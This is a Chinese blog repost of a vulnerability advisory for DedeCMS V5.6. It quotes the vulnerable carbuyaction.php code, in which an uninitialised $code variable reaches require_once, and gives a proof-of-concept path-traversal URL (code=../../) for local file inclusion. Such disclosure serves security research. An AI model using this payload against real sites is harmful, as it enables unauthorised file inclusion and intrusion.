漏洞版本:

DedeCmsV5.6 

漏洞描述:

DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

1	<?php
02	require_once (dirname(__FILE__) . "/../include/common.inc.php");
03	define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
04	require_once DEDEINC.'/dedetemplate.class.php';
05	require_once DEDEINC.'/shopcar.class.php';
06	require_once DEDEINC.'/memberlogin.class.php';
07	 
08	if($cfg_mb_open=='N')
09	{
10	        ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;");
11	        exit();
12	}
13	 
14	$cfg_ml = new MemberLogin();
15	 
16	if(!isset($dopost) || empty($dopost)){   //只要$dopost不为空就行,By:俺是农村的。
17	        ...
18	}elseif($dopost == 'return'){
19	        require_once DEDEINC.'/payment/'.$code.'.php';  //变量$code未初始化,By:俺是农村的。
20	        $pay = new $code;
21	        $msg=$pay->respond();
22	        ShowMsg($msg,"javascript:;",0,3000);
23	        exit();  
24	}
25	?>

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../
posted on 2014-03-21 15:27  milantgh  阅读(3333)  评论(0编辑  收藏  举报